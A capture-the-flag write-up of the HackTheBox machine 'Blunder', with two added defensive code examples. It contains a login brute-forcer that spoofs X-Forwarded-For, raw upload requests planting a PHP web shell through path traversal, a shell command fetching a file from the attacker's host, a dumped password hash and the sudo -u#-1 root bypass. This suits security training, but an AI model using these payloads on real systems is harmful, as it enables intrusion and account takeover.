Blunder: HackTheBox

  • Directory busting to find the admin portal and the todo.txt file.
  • Brute-force the password.
  • Exploit the file upload vulnerability to get a shell.
  • Enumerate the machine to escalate privileges.
  • Find an exploit to bypass the sudo restriction.

Nmap

# nmap -T4 -p- -A -o nmap 10.10.10.191
Nmap scan report for 10.10.10.191
Host is up (0.16s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE VERSION
21/tcp closed ftp
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: Blunder
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Blunder | A blunder of interesting facts
Aggressive OS guesses: HP P2000 G3 NAS device (91%), Linux 2.6.32 (90%), Linux 2.6.32 - 3.1 (90%), Infomir MAG-250 set-top box (90%), Ubiquiti AirMax NanoStation WAP (Linux 2.6.32) (90%), Linux 3.7 (90%), Ubiquiti AirOS 5.5.9 (90%), Ubiquiti Pico Station WAP (AirOS 5.2.6) (89%), Linux 2.6.32 - 3.13 (89%), Linux 3.0 - 3.2 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
-T4 : timing template 4 (aggressive)
-p- : scan all the ports
-A : OS detection, version detection, script scanning and traceroute
-o : write the scan result to a file

Port 80

Directory busting

$ gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.191 -x php,txt -o dirs
/about (Status: 200)
/0 (Status: 200)
/admin (Status: 301)
/install.php (Status: 200)
/empty (Status: 200)
/robots.txt (Status: 200)
/todo.txt (Status: 200)
/usb (Status: 200)
/LICENSE (Status: 200)
-w : wordlist
-u : URL
-x : File extension to search for
-o : Output file to write results
Contents of /todo.txt (the fergus username comes from here):
-Update the CMS
-Turn off FTP - DONE
-Remove old users - DONE
-Inform fergus that the new blog needs images - PENDING
$ cewl -w ro.txt http://10.10.10.191
#!/usr/bin/env python3
import re
import requests

host = 'http://10.10.10.191'
login_url = host + '/admin/'
username = 'fergus'
wordlist = []

# Generate 50 incorrect passwords
#for i in range(50):
#    wordlist.append('Password{i}'.format(i = i))
# Add the correct password to the end of the list
#wordlist.append('adminadmin')

# Read the candidate passwords from the cewl-generated wordlist file
f = open("wordlists")
for data in f.readlines():
    wordlist.append(data.strip())
f.close()

for password in wordlist:
    session = requests.Session()
    # Fetch the login page to get a fresh CSRF token for this attempt
    login_page = session.get(login_url)
    csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text).group(1)
    print('[*] Trying: {p}'.format(p = password))
    headers = {
        # A different X-Forwarded-For value on every attempt, so the CMS's per-IP lockout never trips
        'X-Forwarded-For': password,
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36',
        'Referer': login_url
    }
    data = {
        'tokenCSRF': csrf_token,
        'username': username,
        'password': password,
        'save': ''
    }
    login_result = session.post(login_url, headers = headers, data = data, allow_redirects = False)
    # A redirect to the dashboard means the credentials were accepted
    if 'location' in login_result.headers:
        if '/admin/dashboard' in login_result.headers['location']:
            print()
            print('SUCCESS: Password found!')
            print('Use {u}:{p} to login.'.format(u = username, p = password))
            print()
            break
fergus : RolandDeschain
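The script above only works because the CMS keys its login lockout on the X-Forwarded-For header, which the client controls. As an added example (not from this writeup and not Bludit's code), here is a throttle that honours that header only when the TCP peer is a trusted reverse proxy; the proxy range, peer addresses and 5-attempt limit are constructed for the demonstration.

```python
import ipaddress
from collections import defaultdict

# Constructed values for the demonstration: the only hosts allowed to set X-Forwarded-For
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/24")]
MAX_FAILURES = 5          # lockout threshold per client key
WINDOW_SECONDS = 300      # sliding window for counting failures


def client_ip_naive(peer_ip, headers):
    """Weak: trusts X-Forwarded-For from anyone, so one peer can look like a new client on every attempt."""
    return headers.get("X-Forwarded-For", peer_ip).split(",")[0].strip()


def client_ip_hardened(peer_ip, headers):
    """Honour X-Forwarded-For only when the TCP peer is one of our own proxies; otherwise key on the peer."""
    if any(ipaddress.ip_address(peer_ip) in net for net in TRUSTED_PROXIES):
        xff = headers.get("X-Forwarded-For", "")
        if xff:
            try:  # the last hop is the one our proxy appended; reject garbage such as a password string
                return str(ipaddress.ip_address(xff.split(",")[-1].strip()))
            except ValueError:
                pass
    return peer_ip


class LoginThrottle:
    def __init__(self, resolve_ip):
        self.resolve_ip = resolve_ip
        self.failures = defaultdict(list)   # client key -> timestamps of recent failures

    def is_blocked(self, peer_ip, headers, now):
        key = self.resolve_ip(peer_ip, headers)
        self.failures[key] = [t for t in self.failures[key] if now - t < WINDOW_SECONDS]
        return len(self.failures[key]) >= MAX_FAILURES

    def record_failure(self, peer_ip, headers, now):
        self.failures[self.resolve_ip(peer_ip, headers)].append(now)


def simulate_rotating_xff(resolve_ip, attempts=20):
    """Replay the trick from the script above (one peer, fresh X-Forwarded-For per try); return attempts let through."""
    throttle = LoginThrottle(resolve_ip)
    allowed = 0
    for i in range(attempts):
        headers = {"X-Forwarded-For": "candidate{}".format(i)}  # attacker-chosen, like the password strings above
        if throttle.is_blocked("203.0.113.7", headers, now=float(i)):
            continue
        allowed += 1
        throttle.record_failure("203.0.113.7", headers, now=float(i))   # every guess is wrong in this simulation
    return allowed
```

With the naive resolver all 20 attempts get through; with the hardened one the peer is locked out after the fifth failure.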
http://10.10.10.191/admin/about
POST /admin/ajax/upload-images HTTP/1.1
Host: 10.10.10.191
Content-Length: 27550
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvdbAfQfvdjrTLooA
Origin: http://10.10.10.191
Referer: http://10.10.10.191/admin/new-content
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,fr;q=0.8
Cookie: BLUDIT-KEY=q5604mab2r7h11hua34crtng26
Connection: close
------WebKitFormBoundaryvdbAfQfvdjrTLooA
Content-Disposition: form-data; name="images[]"; filename="bear.jpg"
Content-Type: image/jpeg
//imagedata
------WebKitFormBoundaryvdbAfQfvdjrTLooA
Content-Disposition: form-data; name="uuid"
7f974f44bd782ce95b7822da7bfea72a
------WebKitFormBoundaryvdbAfQfvdjrTLooA
Content-Disposition: form-data; name="tokenCSRF"
3932e46b872ca59f022dd197c1b03b60b9f0d2c0
------WebKitFormBoundaryvdbAfQfvdjrTLooA--
http://10.10.10.191/bl-content/uploads/pages/uuid-value
http://10.10.10.191/bl-content/tmp/temp/
POST /admin/ajax/upload-images HTTP/1.1
Host: 10.10.10.191
Content-Length: 456
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvdbAfQfvdjrTLooA
Origin: http://10.10.10.191
Referer: http://10.10.10.191/admin/new-content
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,fr;q=0.8
Cookie: BLUDIT-KEY=q5604mab2r7h11hua34crtng26
Connection: close
------WebKitFormBoundaryvdbAfQfvdjrTLooA
Content-Disposition: form-data; name="images[]"; filename="evil.jpg"
Content-Type: image/jpeg
<?php system($_GET['cmd']); ?>
------WebKitFormBoundaryvdbAfQfvdjrTLooA
Content-Disposition: form-data; name="uuid"
../../tmp/temp
------WebKitFormBoundaryvdbAfQfvdjrTLooA
Content-Disposition: form-data; name="tokenCSRF"
3932e46b872ca59f022dd197c1b03b60b9f0d2c0
------WebKitFormBoundaryvdbAfQfvdjrTLooA--
HTTP/1.1 200 OK
Date: Thu, 13 Aug 2020 17:00:04 GMT
Server: Apache/2.4.41 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 63
Connection: close
Content-Type: application/json
{"status":0,"message":"Images uploaded.","images":["evil.jpg"]}
POST /admin/ajax/upload-images HTTP/1.1
Host: 10.10.10.191
Content-Length: 456
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvdbAfQfvdjrTLooA
Origin: http://10.10.10.191
Referer: http://10.10.10.191/admin/new-content
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,fr;q=0.8
Cookie: BLUDIT-KEY=q5604mab2r7h11hua34crtng26
Connection: close
------WebKitFormBoundaryvdbAfQfvdjrTLooA
Content-Disposition: form-data; name="images[]"; filename=".htaccess"
Content-Type: image/jpeg
RewriteEngine Off
AddType application/x-httpd-php .jpg

------WebKitFormBoundaryvdbAfQfvdjrTLooA
Content-Disposition: form-data; name="uuid"
../../tmp/temp
------WebKitFormBoundaryvdbAfQfvdjrTLooA
Content-Disposition: form-data; name="tokenCSRF"
3932e46b872ca59f022dd197c1b03b60b9f0d2c0
------WebKitFormBoundaryvdbAfQfvdjrTLooA--
HTTP/1.1 200 OK
Date: Thu, 13 Aug 2020 17:06:55 GMT
Server: Apache/2.4.41 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 92
Connection: close
Content-Type: application/json
{"status":1,"message":"File type is not supported. Allowed types: gif, png, jpg, jpeg, svg"}
http://10.10.10.191/bl-content/tmp/temp/evil.jpg?cmd=whoami
www-data
http://10.10.10.191/bl-content/tmp/uploaded-php-file
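The upload above gets through on two weaknesses: the uuid field is joined into the destination path without validation (so ../../tmp/temp escapes the uploads directory), and the file is judged by its name rather than its contents. As an added example (not from this writeup and not Bludit's code), here is a validator that allowlists the uuid, confirms the resolved path stays under the uploads root, and checks the image magic bytes before anything is written; the uploads root is a constructed path.

```python
import os
import re
from typing import Optional, Tuple

# Constructed layout for the demonstration; not Bludit's own code or paths
UPLOADS_ROOT = "/var/www/html/bl-content/uploads/pages"
ALLOWED_EXT = {".jpg": "image/jpeg", ".jpeg": "image/jpeg", ".png": "image/png", ".gif": "image/gif"}
MAGIC = [(b"\xff\xd8\xff", "image/jpeg"), (b"\x89PNG\r\n\x1a\n", "image/png"),
         (b"GIF87a", "image/gif"), (b"GIF89a", "image/gif")]


def sniff_image(data: bytes) -> Optional[str]:
    """Identify the image type from its leading magic bytes, not from the name or Content-Type."""
    for magic, mime in MAGIC:
        if data.startswith(magic):
            return mime
    return None


def safe_target_dir(uuid: str, root: str = UPLOADS_ROOT) -> Optional[str]:
    """Accept only a 32-hex-digit uuid and confirm the joined path stays under root."""
    if not re.fullmatch(r"[0-9a-f]{32}", uuid):      # '../../tmp/temp' fails the allowlist immediately
        return None
    target = os.path.normpath(os.path.join(root, uuid))
    if os.path.commonpath([root, target]) != root:   # defence in depth; normpath does not follow symlinks
        return None
    return target


def validate_upload(filename: str, data: bytes, uuid: str) -> Tuple[bool, str, Optional[str]]:
    """Run every check before the file is written anywhere the web server can serve from."""
    name = os.path.basename(filename).lower()
    ext = os.path.splitext(name)[1]
    if name.startswith(".") or ext not in ALLOWED_EXT:   # rejects .htaccess and other dotfiles outright
        return False, "extension not allowed", None
    mime = sniff_image(data)
    if mime != ALLOWED_EXT[ext]:                           # a '<?php' body named evil.jpg fails here
        return False, "content does not match the claimed image type", None
    target = safe_target_dir(uuid)
    if target is None:
        return False, "invalid uuid", None
    return True, "ok", os.path.join(target, name)
```

A polyglot that begins with a genuine JPEG header and carries PHP after it still passes the magic check, so the upload tree must also be served with script execution disabled and with no client-writable .htaccess files.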

Getting Shell

http://10.10.10.191/bl-content/tmp/temp/evil.jpg?cmd=wget%2010.10.14.192:8000/sh.php
drwxr-xr-x 5 root root 4096 Nov 28 2019 .
drwxr-xr-x 15 root root 4096 Nov 27 2019 ..
drwxr-xr-x 8 www-data www-data 4096 May 19 15:13 bludit-3.10.0a
drwxrwxr-x 8 www-data www-data 4096 Apr 28 12:18 bludit-3.9.2
drwxr-xr-x 2 root root 4096 Nov 28 2019 html
<?php defined('BLUDIT') or die('Bludit CMS.'); ?>
{
    "admin": {
        "nickname": "Hugo",
        "firstName": "Hugo",
        "lastName": "",
        "role": "User",
        "password": "faca404fd5c0a31cf1897b823c695c85cffeb98d",
        "email": "",
        "registered": "2019-11-27 07:40:55",
        "tokenRemember": "",
        "tokenAuth": "b380cb62057e9da47afce66b4615107d",
        "tokenAuthTTL": "2009-03-15 14:00",
        "twitter": "",
        "facebook": "",
        "instagram": "",
        "codepen": "",
        "linkedin": "",
        "github": "",
        "gitlab": ""
    }
}
$ su hugo
Password : Password123
$ /bin/bash
hugo@blunder:~$ wc user.txt
1 1 33 user.txt

Root

hugo@blunder:~$ sudo -u#-1 /bin/bash
sudo -u#-1 /bin/bash
root@blunder:/home/hugo#

Roshan Guragain

Infosec Enthusiast